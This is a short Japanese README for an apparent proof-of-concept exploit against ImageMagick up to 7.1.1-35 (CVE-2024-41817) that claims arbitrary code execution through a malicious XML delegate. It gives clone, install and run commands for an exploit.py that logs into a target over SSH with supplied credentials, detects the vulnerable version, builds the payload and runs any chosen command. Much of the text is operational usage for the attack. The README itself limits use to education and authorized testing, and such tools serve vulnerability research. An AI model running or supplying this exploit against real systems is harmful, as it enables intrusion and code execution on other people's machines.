
ImageMagick バージョン <= 7.1.1-35 向けの Proof of Concept エクスプロイトで、悪意のある XML デリゲーションを介して任意コード実行を可能にします。
このエクスプロイトは、特別に細工されたライブラリを介して任意コード実行を可能にする ImageMagick の脆弱性を利用します。このスクリプトは以下のことができます:
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command: 実行するコマンド (デフォルト: "id")-H, --host: ターゲットホスト-p, --port: SSH ポート (デフォルト: 22)-u, --username: SSH ユーザー名-P, --password: SSH パスワード-d, --detection: 脆弱な ImageMagick を自動検出-B, --build: ペイロードのみビルド-A, --auto: フルオートモード-v, --verbose: 詳細出力このツールは教育目的のみで使用してください。テストする許可を得たシステムに対してのみ使用してください。